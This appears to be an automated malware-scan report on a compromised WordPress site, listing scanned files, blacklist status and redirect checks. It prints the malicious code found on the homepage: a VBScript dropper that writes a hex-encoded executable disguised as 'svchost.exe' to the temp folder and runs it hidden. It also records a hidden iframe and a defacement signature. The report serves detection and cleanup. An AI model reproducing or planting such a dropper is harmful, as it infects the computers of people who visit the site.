Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=neillongonline.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.neillongonline.com/ | 200 OK Content-Length: 119403 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Hidden iFrame found. size: 1x0 src: http://picosong.com/6fdj/ <iframe frameborder="0" height="0" src="http://picosong.com/6fdj/" width="1"> Deface/Content modification. The following signature was found: Hacked by Fouzi Baws-DZ & Farouk General <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/> <meta name="robot ...[120384 bytes skipped]... | ||
http://www.neillongonline.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 23 Dec 2015 15:33:39 GMT Pragma: no-cache Location: http://neillongonline.com/test404page.js Server: nginx/1.8.0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=8d4793ae46e19e73d68ffc0ad374a334; path=/ X-Pingback: http://neillongonline.com/xmlrpc.php X-UA-Compatible: IE=edge,chrome=1 | clean |
http://neillongonline.com/test404page.js | 404 Not Found Content-Length: 20172 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: neillong.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18564426-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scri ...[4391 bytes skipped]... | ||
http://neillongonline.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_audio-player.js | 200 OK Content-Length: 12020 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js?ver=3.9.9 | 200 OK Content-Length: 177127 Content-Type: application/x-javascript | clean |
http://neillongonline.com/wp-content/plugins/facebook-comments-notifier/fb-comments.js?ver=3.9.9 | 200 OK Content-Length: 4871 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/podpress/js/podpress.js?ver=3.9.9 | 200 OK Content-Length: 39825 Content-Type: application/javascript | clean |
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 148483 Content-Type: application/x-javascript | clean |
http://neillongonline.com/wp-content/plugins/wp-viral-payments/player/flowplayer/flowplayer.min.js | 200 OK Content-Length: 19756 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/wp-viral-payments/player/js/checkvideo.js | 200 OK Content-Length: 2705 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/maxblogpress-unblockable-popup/mup-lib/include/mup_simple/upop_fade.js | 200 OK Content-Length: 9127 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 177127 Content-Type: application/x-javascript | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/wp-viral-payments/js/custom-functions.js?ver=3.9.9 | 200 OK Content-Length: 7645 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: neillongonline.com
Result:
GET / HTTP/1.1
Host: neillongonline.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: neillongonline.com
Referer: http://www.google.com/search?q=neillongonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: neillongonline.com
Referer: http://www.google.com/search?q=neillongonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.